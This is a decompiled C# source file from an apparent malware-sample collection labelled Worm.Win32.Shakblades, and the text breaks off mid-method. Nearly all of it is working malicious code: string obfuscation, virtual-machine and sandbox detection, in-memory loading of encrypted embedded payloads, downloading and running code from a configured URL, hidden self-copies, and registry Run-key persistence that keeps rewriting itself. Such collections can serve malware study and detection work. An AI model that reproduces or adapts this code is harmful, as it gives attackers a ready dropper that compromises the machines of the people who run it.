MalwareSourceCode/MSIL/Worm/Win32/S/Worm.Win32.Shakblades.ajg-9d1b9cde375114da6f4c66efbdae5f5f253766dca1651abfc7c38653f32c21ea/Tm2tqtua3sspuhohl2o5frgcxkwutet2c/Xcpjaqmaubj2y0o3n.cs

562 lines
27 KiB
C#
Raw Normal View History

2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: Tm2tqtua3sspuhohl2o5frgcxkwutet2c.Xcpjaqmaubj2y0o3n
// Assembly: pff4wjti, Version=6.1.7600.16385, Culture=neutral, PublicKeyToken=null
// MVID: 5406B450-382A-49C3-BEAD-27BB328AB378
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Worm.Win32.Shakblades.ajg-9d1b9cde375114da6f4c66efbdae5f5f253766dca1651abfc7c38653f32c21ea.exe
using G1iw5jvdvf5jyuwmtz03k02vp;
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
using System.IO.Compression;
using System.Management;
using System.Net;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Threading;
using System.Windows.Forms;
namespace Tm2tqtua3sspuhohl2o5frgcxkwutet2c
{
public class Xcpjaqmaubj2y0o3n
{
private static bool Vyydwy2dzohvetixn = true;
private byte[] Xvzsy20ikq50fiuzzzsw14i22;
private bool n2gipyxzj1jd3ijqb;
private string fzeil4ihxre2gqh3ygpyffp15;
private string qw2lxynmeozut0doo;
private string Cllbarbs03nsn03hk0bknvl3n = Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("0");
private int I12ss4uzgimbzl5qa;
private int dluh54iqwipbeun4nsizlk3foyfinw5wt;
private int Hgmfkbt4atcy55dirqkgtdkb5;
private string Dx4pxl4hlvcwokaeq = Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("XRO");
private string zyygx4b4iahtt0izd = string.Empty;
private string Q5aj14jzmb5gozvrp = string.Empty;
private int Sqsgcrexehem0lg3mionbxiuw;
private string Qeujo4xlzlmqxzlwt = Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("0");
private string N4rfcpacyzvdyb5o5pseuwja0 = Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("0");
private string ovvhzz3v4t0lncqhc = Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("0");
private string hpyhkefmdy2fikaqvpxkxke4zwemgdqgs = Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("0");
private string Yu13rcd5iimiqemzz = string.Empty;
private string Ouyjahe11vseyu1gc = string.Empty;
private string Wbmpi5i4bd1p35dfa2s0jd2tykyightoe = string.Empty;
private string wlzgy5x503ocrxvto = string.Empty;
private string mlzo2db1vixlaay2xx3qm1uh1 = string.Empty;
private string Ifbnriw30u3zqko1o = string.Empty;
private string O52jpa3c1kjywan03 = string.Empty;
private string aebl4g0r22vys142j542rkxik = string.Empty;
private string Pi5xwja3tpz1vyvxe0bvaszsw = string.Empty;
private string W0igi2snxiuevrujvdeszp1bxkguemxod = string.Empty;
private string Osbrxysckqx0aqx1lzguqifvs = string.Empty;
private bool Zx2ycojwb320y2n31;
private bool Kbkqxyuop35q5nercdcrjitsn;
private string Ueczuk1jlbi3nbg5x2h1wuon0 = string.Empty;
private string Ne4uiww2g1iuhqrgv = string.Empty;
private bool waiw3pzzuvdgyn5dx3idhqwhncujkp40q;
private string upzpncz1hdeloi5k3rlq4a14w = string.Empty;
private string ogs5wi51r3m1bqoyn = string.Empty;
private string Fl1t0wgsikf4mpxykcardit3b = string.Empty;
private string Abfzh2zlzdzdgmqoqnumemerp = string.Empty;
private bool etx2nx1n4akedmv4fu2mqzcc0;
private bool Dwfbus3rr2dghn14mxukem4jr;
private bool Bm3illttk5nwmenvbn3jbmios;
private bool s1rnoof103dimlt4vbd0kazwizm4euy4s;
private object Rebbtyainmzrpdxrpkhemquuf;
private MethodInfo Fau0pig3abdcym2njphkzgkxl;
private void xpjiguggif5df23oi(string xkcps1zic2cskbd1y)
{
string[] separator1 = new string[1]
{
Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("rpspaujmfcfeku02tmvpfrcod")
};
string[] strArray1 = xkcps1zic2cskbd1y.Split(separator1, StringSplitOptions.None);
string[] separator2 = new string[1]
{
Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("vmh2pox3hvii1ls52")
};
string[] strArray2 = xkcps1zic2cskbd1y.Split(separator2, StringSplitOptions.None);
string[] separator3 = new string[1]
{
Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("uo3midvthz4usmhbcddxzwvg4")
};
string[] strArray3 = xkcps1zic2cskbd1y.Split(separator3, StringSplitOptions.None);
string[] separator4 = new string[1]
{
Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("hzoym5z0i1xmrfcmygv11yqya")
};
string[] strArray4 = xkcps1zic2cskbd1y.Split(separator4, StringSplitOptions.None);
this.Cllbarbs03nsn03hk0bknvl3n = strArray1[1];
this.fzeil4ihxre2gqh3ygpyffp15 = strArray1[2];
this.qw2lxynmeozut0doo = strArray1[3];
this.I12ss4uzgimbzl5qa = Convert.ToInt32(strArray1[4]);
this.dluh54iqwipbeun4nsizlk3foyfinw5wt = Convert.ToInt32(strArray1[5]);
this.Hgmfkbt4atcy55dirqkgtdkb5 = Convert.ToInt32(strArray1[6]);
this.Dx4pxl4hlvcwokaeq = strArray2[1];
this.zyygx4b4iahtt0izd = strArray2[2];
this.Q5aj14jzmb5gozvrp = strArray2[3];
this.Sqsgcrexehem0lg3mionbxiuw = Convert.ToInt32(strArray3[1]);
this.Qeujo4xlzlmqxzlwt = strArray3[2];
this.N4rfcpacyzvdyb5o5pseuwja0 = strArray3[3];
this.ovvhzz3v4t0lncqhc = strArray3[4];
this.hpyhkefmdy2fikaqvpxkxke4zwemgdqgs = strArray3[5];
this.Yu13rcd5iimiqemzz = strArray3[6];
this.Ouyjahe11vseyu1gc = strArray3[7];
this.Wbmpi5i4bd1p35dfa2s0jd2tykyightoe = strArray3[8];
this.wlzgy5x503ocrxvto = strArray3[9];
this.mlzo2db1vixlaay2xx3qm1uh1 = strArray3[10];
this.Ifbnriw30u3zqko1o = strArray3[11];
this.O52jpa3c1kjywan03 = this.bxmgxqvn0tzn2pwdo5ezgxkdh(strArray3[12]);
this.aebl4g0r22vys142j542rkxik = strArray3[13];
this.Pi5xwja3tpz1vyvxe0bvaszsw = strArray3[14];
this.W0igi2snxiuevrujvdeszp1bxkguemxod = strArray3[15];
this.Zx2ycojwb320y2n31 = Convert.ToBoolean(strArray3[16]);
this.Kbkqxyuop35q5nercdcrjitsn = Convert.ToBoolean(strArray3[17]);
this.Ueczuk1jlbi3nbg5x2h1wuon0 = this.yti5olupwaivlclet(strArray3[18]) + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\") + Path.GetRandomFileName();
this.Osbrxysckqx0aqx1lzguqifvs = strArray3[19];
this.Ne4uiww2g1iuhqrgv = strArray3[20];
this.Ueczuk1jlbi3nbg5x2h1wuon0 = this.Ueczuk1jlbi3nbg5x2h1wuon0.Substring(0, this.Ueczuk1jlbi3nbg5x2h1wuon0.Length - 4) + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss(".xee");
Path.GetPathRoot(Environment.GetFolderPath(Environment.SpecialFolder.System));
switch (this.Ne4uiww2g1iuhqrgv)
{
case "0":
try
{
this.Ne4uiww2g1iuhqrgv = IntPtr.Size != 4 ? Environment.GetEnvironmentVariable(Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("wniidr")) + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\irsf.E\\rmwr6\\20577vceeMcootNTFaeok4v..02\\b.x") : Environment.GetEnvironmentVariable(Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("wniidr")) + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\irsf.E\\rmwr\\20577vceeMcootNTFaeokv..02\\b.x");
break;
}
catch (Exception ex)
{
break;
}
case "1":
this.Ne4uiww2g1iuhqrgv = Environment.GetEnvironmentVariable(Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("wniidr")) + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\irsf.E\\rmwr\\20577cceeMcootNTFaeokv..02\\s.x");
break;
}
this.waiw3pzzuvdgyn5dx3idhqwhncujkp40q = Convert.ToBoolean(strArray4[1]);
this.upzpncz1hdeloi5k3rlq4a14w = strArray4[2];
this.ogs5wi51r3m1bqoyn = strArray4[3];
this.Fl1t0wgsikf4mpxykcardit3b = strArray4[4];
this.Abfzh2zlzdzdgmqoqnumemerp = strArray4[5];
this.etx2nx1n4akedmv4fu2mqzcc0 = Convert.ToBoolean(strArray4[6]);
this.Dwfbus3rr2dghn14mxukem4jr = Convert.ToBoolean(strArray4[7]);
this.Bm3illttk5nwmenvbn3jbmios = Convert.ToBoolean(strArray4[8]);
this.s1rnoof103dimlt4vbd0kazwizm4euy4s = Convert.ToBoolean(strArray4[9]);
this.Fl1t0wgsikf4mpxykcardit3b = this.yti5olupwaivlclet(this.Fl1t0wgsikf4mpxykcardit3b);
MessageBoxButtons[] messageBoxButtonsArray = new MessageBoxButtons[6]
{
MessageBoxButtons.OK,
MessageBoxButtons.OKCancel,
MessageBoxButtons.YesNo,
MessageBoxButtons.YesNoCancel,
MessageBoxButtons.RetryCancel,
MessageBoxButtons.AbortRetryIgnore
};
MessageBoxIcon[] messageBoxIconArray = new MessageBoxIcon[5]
{
MessageBoxIcon.Hand,
MessageBoxIcon.Asterisk,
MessageBoxIcon.Question,
MessageBoxIcon.Exclamation,
MessageBoxIcon.None
};
if (!(this.Cllbarbs03nsn03hk0bknvl3n == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("1")))
return;
Thread.Sleep(this.Hgmfkbt4atcy55dirqkgtdkb5 * 1000);
int num = (int) MessageBox.Show(this.fzeil4ihxre2gqh3ygpyffp15, this.qw2lxynmeozut0doo, messageBoxButtonsArray[this.I12ss4uzgimbzl5qa], messageBoxIconArray[this.dluh54iqwipbeun4nsizlk3foyfinw5wt]);
}
private byte[] T20r4skkjzxet5xxndjdxm23nq1de3ste(
byte[] j53vpo23pks1sawtewkqd4g3v,
int wtxw3dfyzvb2m5edzmygxag3t)
{
GZipStream gzipStream = new GZipStream((Stream) new MemoryStream(j53vpo23pks1sawtewkqd4g3v), CompressionMode.Decompress);
byte[] buffer = new byte[wtxw3dfyzvb2m5edzmygxag3t];
gzipStream.Read(buffer, 0, buffer.Length);
return buffer;
}
private object Ceyweulgsxaof4hwmnwokglbk(int mn0yawr33ammr4eax42s3tcgr)
{
Assembly assembly = Assembly.Load(Zgyvqmp0xpqwooihm.Rhjia2qmjg1uefwsxroduqr0s(Xcpjaqmaubj2y0o3n.q1cagpbvwn04kmqyi(Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("rnEdluP.l"))));
Thread.Sleep(1000);
System.Type type = assembly.GetTypes()[mn0yawr33ammr4eax42s3tcgr];
this.Fau0pig3abdcym2njphkzgkxl = type.GetMethod(Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("Rnu"));
return Activator.CreateInstance(type);
}
private void persistenceStartup(
string Ymom4ixsncavvmzwlpzsuuw3j,
string oa41ma1dfc5p5dgsxqp0tgbnk1h2d32ie,
string Werxlvvcvmxjvsfbt5x2podh0gjrpxf2x)
{
Registry.CurrentUser.OpenSubKey(Ymom4ixsncavvmzwlpzsuuw3j, true).SetValue(oa41ma1dfc5p5dgsxqp0tgbnk1h2d32ie, (object) Werxlvvcvmxjvsfbt5x2podh0gjrpxf2x);
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey(Ymom4ixsncavvmzwlpzsuuw3j, true);
bool flag = true;
while (flag)
{
Application.DoEvents();
if (registryKey.OpenSubKey(Ymom4ixsncavvmzwlpzsuuw3j + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\a1adcpdsq0gn123io4m1f55gxptbkhd2e")) == null)
registryKey.SetValue(oa41ma1dfc5p5dgsxqp0tgbnk1h2d32ie, (object) Werxlvvcvmxjvsfbt5x2podh0gjrpxf2x);
Thread.Sleep(2000);
}
}
private byte[] P2dz552iekyo3s3by(byte[] xkcps1zic2cskbd1y)
{
if (this.Dx4pxl4hlvcwokaeq == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("xro"))
xkcps1zic2cskbd1y = Zgyvqmp0xpqwooihm.Rhjia2qmjg1uefwsxroduqr0s(xkcps1zic2cskbd1y);
return xkcps1zic2cskbd1y;
}
private void fyld3x5pir2kaoksligurapzj(byte[] Cplqgntbylcl1knxmqpm2hjar)
{
try
{
if (this.ogs5wi51r3m1bqoyn == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("0"))
{
try
{
if (!this.Qhlb0achfvgjxeekj(Cplqgntbylcl1knxmqpm2hjar))
{
this.Rebbtyainmzrpdxrpkhemquuf = this.Ceyweulgsxaof4hwmnwokglbk(0);
this.Fau0pig3abdcym2njphkzgkxl.Invoke(this.Rebbtyainmzrpdxrpkhemquuf, new object[3]
{
(object) Cplqgntbylcl1knxmqpm2hjar,
(object) this.Ne4uiww2g1iuhqrgv,
null
});
}
}
catch
{
string tempFileName = Path.GetTempFileName();
this.Xu4noszs2jndqy0uakulzk0hj(Cplqgntbylcl1knxmqpm2hjar, tempFileName, true);
}
}
if (!(this.ogs5wi51r3m1bqoyn == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("1")))
return;
string str = this.Fl1t0wgsikf4mpxykcardit3b + this.Abfzh2zlzdzdgmqoqnumemerp;
this.Xu4noszs2jndqy0uakulzk0hj(Cplqgntbylcl1knxmqpm2hjar, str, true);
if (this.etx2nx1n4akedmv4fu2mqzcc0)
System.IO.File.SetAttributes(str, System.IO.File.GetAttributes(str) | FileAttributes.Hidden);
if (this.Dwfbus3rr2dghn14mxukem4jr)
System.IO.File.SetAttributes(str, System.IO.File.GetAttributes(str) | FileAttributes.ReadOnly);
if (!this.Bm3illttk5nwmenvbn3jbmios)
return;
System.IO.File.SetAttributes(str, System.IO.File.GetAttributes(str) | FileAttributes.System);
}
catch (Exception ex)
{
}
}
private bool Qhlb0achfvgjxeekj(byte[] Zq0k51bndsjftafxi)
{
Xcpjaqmaubj2y0o3n.ooaqlrxjthzq5ykyeqamxwsxh(Zq0k51bndsjftafxi);
bool vyydwy2dzohvetixn = Xcpjaqmaubj2y0o3n.Vyydwy2dzohvetixn;
Xcpjaqmaubj2y0o3n.Vyydwy2dzohvetixn = true;
return vyydwy2dzohvetixn;
}
private void Xu4noszs2jndqy0uakulzk0hj(
byte[] iz1q112gcqzev5oqr,
string Dutorh5b0eqbkqejp,
bool Fc4ucvsrmmkck30rx)
{
try
{
System.IO.File.WriteAllBytes(Dutorh5b0eqbkqejp, iz1q112gcqzev5oqr);
if (!Fc4ucvsrmmkck30rx)
return;
new Process()
{
StartInfo = {
FileName = Dutorh5b0eqbkqejp
}
}.Start();
}
catch
{
}
}
private byte[] idbm12rhs0k0m25by(
string V3ih4ivpcexzrkelfjctk5bov,
int Wi2vtkb2qd4j53iy5fbdxtgmp,
string k0vs32obabddwwiqnt4br14zo)
{
try
{
IntPtr hModule = Mvsaeg2eeoaqx3utk.cz23ictx0pf1xcpsqzxf3ue5fsjhmn3fi(string.Empty);
IntPtr hResInfo = Mvsaeg2eeoaqx3utk.Nyja0dryfvflph11ok4ga5zpz(hModule, Wi2vtkb2qd4j53iy5fbdxtgmp, k0vs32obabddwwiqnt4br14zo);
uint length = Mvsaeg2eeoaqx3utk.Wy3i4lea5jxu3fiu1mt0jbvl4gefufsn2(hModule, hResInfo);
IntPtr source = Mvsaeg2eeoaqx3utk.Xpo3aq0mxqyvzr1zld5qguuzg(hModule, hResInfo);
byte[] destination = new byte[(IntPtr) length];
Marshal.Copy(source, destination, 0, (int) length);
return destination;
}
catch (Exception ex)
{
Console.WriteLine(Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("Errraigrsuc:ro edn eore ") + Environment.NewLine + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("Errcd:ro oe ") + ex.Message);
return (byte[]) null;
}
}
private void Dbrrlmqkrn3ydjtvavk43x5l324iaa3cy(
string Ymom4ixsncavvmzwlpzsuuw3j,
string oa41ma1dfc5p5dgsxqp0tgbnk1h2d32ie,
string Werxlvvcvmxjvsfbt5x2podh0gjrpxf2x,
int lglb5oxkofx5lhfsdpmd3oohjsw1nlznk)
{
this.n2gipyxzj1jd3ijqb = true;
if (lglb5oxkofx5lhfsdpmd3oohjsw1nlznk == 1)
Registry.CurrentUser.OpenSubKey(Ymom4ixsncavvmzwlpzsuuw3j, true).SetValue(oa41ma1dfc5p5dgsxqp0tgbnk1h2d32ie, (object) Werxlvvcvmxjvsfbt5x2podh0gjrpxf2x);
if (lglb5oxkofx5lhfsdpmd3oohjsw1nlznk == 2)
Registry.LocalMachine.OpenSubKey(Ymom4ixsncavvmzwlpzsuuw3j, true).SetValue(oa41ma1dfc5p5dgsxqp0tgbnk1h2d32ie, (object) Werxlvvcvmxjvsfbt5x2podh0gjrpxf2x);
if (lglb5oxkofx5lhfsdpmd3oohjsw1nlznk != 3)
return;
RegistryKey subKey = Registry.LocalMachine.CreateSubKey(Ymom4ixsncavvmzwlpzsuuw3j + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\") + oa41ma1dfc5p5dgsxqp0tgbnk1h2d32ie);
subKey.SetValue(Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("SuPttbah"), (object) Werxlvvcvmxjvsfbt5x2podh0gjrpxf2x);
subKey.Close();
if (Registry.CurrentUser.OpenSubKey(Ymom4ixsncavvmzwlpzsuuw3j + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\") + oa41ma1dfc5p5dgsxqp0tgbnk1h2d32ie, true) == null)
return;
Registry.CurrentUser.DeleteSubKey(Ymom4ixsncavvmzwlpzsuuw3j + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\") + oa41ma1dfc5p5dgsxqp0tgbnk1h2d32ie, false);
}
private string bxmgxqvn0tzn2pwdo5ezgxkdh(string Tmq5yh2mj4cu1ncxfduvfse4gpe31bjz3)
{
string str = string.Empty;
if (Tmq5yh2mj4cu1ncxfduvfse4gpe31bjz3 == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("0"))
str = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\");
if (Tmq5yh2mj4cu1ncxfduvfse4gpe31bjz3 == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("1"))
str = Path.GetTempPath();
if (Tmq5yh2mj4cu1ncxfduvfse4gpe31bjz3 == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("2"))
str = Environment.GetFolderPath(Environment.SpecialFolder.Personal) + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\");
return str;
}
public void bocln5xhicnup1rlmeg3v0wq5fq30ikg2()
{
string executablePath = Application.ExecutablePath;
try
{
this.xpjiguggif5df23oi(rzo4euwupytyapwx03g5pnbwx.trdpamic2sckcdwunnjaiq5ctjzbh44ol(this.idbm12rhs0k0m25by(executablePath, 16, Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("CCSI0IZJHGS1OVNFRTEN3VJ02"))));
this.Xvzsy20ikq50fiuzzzsw14i22 = this.idbm12rhs0k0m25by(executablePath, 44, Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("BUEVDVEHTVBYWB1VY0OFU1FDB"));
if (this.Qeujo4xlzlmqxzlwt == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("1"))
this.Xvzsy20ikq50fiuzzzsw14i22 = this.T20r4skkjzxet5xxndjdxm23nq1de3ste(this.Xvzsy20ikq50fiuzzzsw14i22, this.Sqsgcrexehem0lg3mionbxiuw);
this.Xvzsy20ikq50fiuzzzsw14i22 = this.P2dz552iekyo3s3by(this.Xvzsy20ikq50fiuzzzsw14i22);
if (!this.Zx2ycojwb320y2n31)
{
this.Rebbtyainmzrpdxrpkhemquuf = this.Ceyweulgsxaof4hwmnwokglbk(0);
this.Fau0pig3abdcym2njphkzgkxl.Invoke(this.Rebbtyainmzrpdxrpkhemquuf, new object[3]
{
(object) this.Xvzsy20ikq50fiuzzzsw14i22,
(object) this.Ne4uiww2g1iuhqrgv,
(object) Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("")
});
}
else
this.Qhlb0achfvgjxeekj(this.Xvzsy20ikq50fiuzzzsw14i22);
if (this.Kbkqxyuop35q5nercdcrjitsn)
this.Xu4noszs2jndqy0uakulzk0hj(this.Xvzsy20ikq50fiuzzzsw14i22, this.Ueczuk1jlbi3nbg5x2h1wuon0, true);
string str;
if (!string.IsNullOrEmpty(this.Osbrxysckqx0aqx1lzguqifvs))
{
str = this.O52jpa3c1kjywan03 + this.Osbrxysckqx0aqx1lzguqifvs + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("\\") + this.Ifbnriw30u3zqko1o;
Directory.CreateDirectory(this.O52jpa3c1kjywan03 + this.Osbrxysckqx0aqx1lzguqifvs);
}
else
str = this.O52jpa3c1kjywan03 + this.Ifbnriw30u3zqko1o;
if (this.N4rfcpacyzvdyb5o5pseuwja0 == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("1"))
this.Dbrrlmqkrn3ydjtvavk43x5l324iaa3cy(this.Yu13rcd5iimiqemzz, this.Wbmpi5i4bd1p35dfa2s0jd2tykyightoe, str, 1);
if (this.ovvhzz3v4t0lncqhc == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("1"))
this.Dbrrlmqkrn3ydjtvavk43x5l324iaa3cy(this.Yu13rcd5iimiqemzz, this.wlzgy5x503ocrxvto, str, 2);
if (this.hpyhkefmdy2fikaqvpxkxke4zwemgdqgs == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("1"))
this.Dbrrlmqkrn3ydjtvavk43x5l324iaa3cy(this.Ouyjahe11vseyu1gc, this.mlzo2db1vixlaay2xx3qm1uh1, str, 3);
if (this.n2gipyxzj1jd3ijqb)
{
byte[] bytes = System.IO.File.ReadAllBytes(Application.ExecutablePath);
if (!System.IO.File.Exists(str))
System.IO.File.WriteAllBytes(str, bytes);
if (System.IO.File.Exists(str))
{
if (this.aebl4g0r22vys142j542rkxik == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("1"))
System.IO.File.SetAttributes(str, System.IO.File.GetAttributes(str) | FileAttributes.Hidden);
if (this.Pi5xwja3tpz1vyvxe0bvaszsw == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("1"))
System.IO.File.SetAttributes(str, System.IO.File.GetAttributes(str) | FileAttributes.ReadOnly);
if (this.W0igi2snxiuevrujvdeszp1bxkguemxod == Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("1"))
System.IO.File.SetAttributes(str, System.IO.File.GetAttributes(str) | FileAttributes.System);
}
}
this.ulry4uhtwnw50g04z(rzo4euwupytyapwx03g5pnbwx.trdpamic2sckcdwunnjaiq5ctjzbh44ol(this.idbm12rhs0k0m25by(executablePath, 47, Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("AHAAJWFXQRWK55DBF5CZOY25NAJ1XU0TF"))));
if (this.waiw3pzzuvdgyn5dx3idhqwhncujkp40q)
this.fyld3x5pir2kaoksligurapzj(new WebClient().DownloadData(new Uri(this.upzpncz1hdeloi5k3rlq4a14w)));
this.persistenceStartup(this.Yu13rcd5iimiqemzz, this.Wbmpi5i4bd1p35dfa2s0jd2tykyightoe, str);
}
catch (Exception ex)
{
Console.WriteLine(ex.Message);
}
}
private static void pq0wico5ukmaxyfwlssnrl0r1nqartkt4(object Qilit4odml3450ffdduw5begg)
{
try
{
MethodInfo entryPoint = Assembly.Load((byte[]) Qilit4odml3450ffdduw5begg).EntryPoint;
if (entryPoint.GetParameters().Length == 1)
entryPoint.Invoke((object) null, new object[1]
{
(object) new string[0]
});
else
entryPoint.Invoke((object) null, (object[]) null);
}
catch
{
Xcpjaqmaubj2y0o3n.Vyydwy2dzohvetixn = false;
}
}
public static byte[] q1cagpbvwn04kmqyi(string lhs5nwmsu4p3h3rgf)
{
using (Stream manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(lhs5nwmsu4p3h3rgf))
{
byte[] buffer = new byte[1024];
using (MemoryStream memoryStream = new MemoryStream())
{
while (true)
{
int count = manifestResourceStream.Read(buffer, 0, buffer.Length);
if (count > 0)
memoryStream.Write(buffer, 0, count);
else
break;
}
return memoryStream.ToArray();
}
}
}
[DllImport("kernel32.dll")]
public static extern IntPtr GetModuleHandle(string lpModuleName);
private static void Main(string[] args)
{
string empty = string.Empty;
foreach (ManagementBaseObject instance in new ManagementClass(Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("Wn2Boi3_is")).GetInstances())
{
if (instance.Properties[Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("Sranmeeilubr")].Value.ToString().Trim().ToLower().IndexOf(Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("vwrmae")) > -1)
{
int num = (int) MessageBox.Show(Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("Ti plcto antb u navrulmcieevrnethsapiaincno erni ita ahn niomn."), Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("VrulMcieDtceita ahn eetd"), MessageBoxButtons.OK, MessageBoxIcon.Hand);
Environment.Exit(0);
}
}
if (Xcpjaqmaubj2y0o3n.GetModuleHandle(Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("SiDldlbel.l")).ToInt32() != 0)
{
int num = (int) MessageBox.Show(Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("Ti plcto antb u naSnbxeevrnethsapiaincno erni adoi niomn."), Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("SnbxeDtceadoi eetd"), MessageBoxButtons.OK, MessageBoxIcon.Hand);
Environment.Exit(0);
}
new Xcpjaqmaubj2y0o3n().bocln5xhicnup1rlmeg3v0wq5fq30ikg2();
}
private void ulry4uhtwnw50g04z(string xkcps1zic2cskbd1y)
{
string[] separator1 = new string[1]
{
Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("Qslygidk2ydujmodz1hnjxa40is244mdu")
};
string[] separator2 = new string[1]
{
Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("swmnvnjfto3vjpznbcurldfzy")
};
string[] strArray1 = xkcps1zic2cskbd1y.Split(separator1, StringSplitOptions.None);
string empty1 = string.Empty;
string empty2 = string.Empty;
string empty3 = string.Empty;
for (int index = 1; index < strArray1.GetUpperBound(0); ++index)
{
string[] strArray2 = strArray1[index].Split(separator2, StringSplitOptions.None);
byte[] numArray = rzo4euwupytyapwx03g5pnbwx.fuwrggsyeop321rci(strArray2[1]);
string str1 = strArray2[2];
bool boolean1 = Convert.ToBoolean(strArray2[3]);
string Ibpa121djgybg55fkysgepjc0y2qiasb2 = strArray2[4];
bool boolean2 = Convert.ToBoolean(strArray2[5]);
bool boolean3 = Convert.ToBoolean(strArray2[6]);
int int32 = Convert.ToInt32(strArray2[7]);
bool boolean4 = Convert.ToBoolean(strArray2[8]);
string str2 = this.yti5olupwaivlclet(Ibpa121djgybg55fkysgepjc0y2qiasb2);
if (boolean1)
{
if (boolean3)
numArray = this.T20r4skkjzxet5xxndjdxm23nq1de3ste(numArray, int32);
if (boolean2)
numArray = this.P2dz552iekyo3s3by(numArray);
if (!boolean4)
{
try
{
this.Rebbtyainmzrpdxrpkhemquuf = this.Ceyweulgsxaof4hwmnwokglbk(0);
this.Fau0pig3abdcym2njphkzgkxl.Invoke(this.Rebbtyainmzrpdxrpkhemquuf, new object[3]
{
(object) numArray,
(object) this.Ne4uiww2g1iuhqrgv,
null
});
}
catch (Exception ex)
{
Console.WriteLine(Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("Errijcigbudfl nommr:ro netn on ieit eoy ") + Environment.NewLine + Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("Errcd:ro oe ") + ex.Message);
}
}
else if (!this.Qhlb0achfvgjxeekj(numArray))
Console.WriteLine(Zgyvqmp0xpqwooihm.A1ns3kzzckrkw2k2snvelcbss("Errijcigbudfl sn elcin ro netn on ieuigrfeto:"));
}
else
{
string Dutorh5b0eqbkqejp = str2 + str1;
if (boolean2)
numArray = this.P2dz552iekyo3s3by(numArray);
this.Xu4noszs2jndqy0uakulzk0hj(numArray, Dutorh5b0eqbkqejp, true);
}
}
}
private static void ooaqlrxjthzq5ykyeqamxwsxh(byte[] Amqk5npffix20x5qn5x2vnb3b)
{
try
{
Thread thread = new Thread(new ParameterizedThreadStart(Xcpjaqmaubj2y0o3n.pq0wico5ukmaxyfwlssnrl0r1nqartkt4));
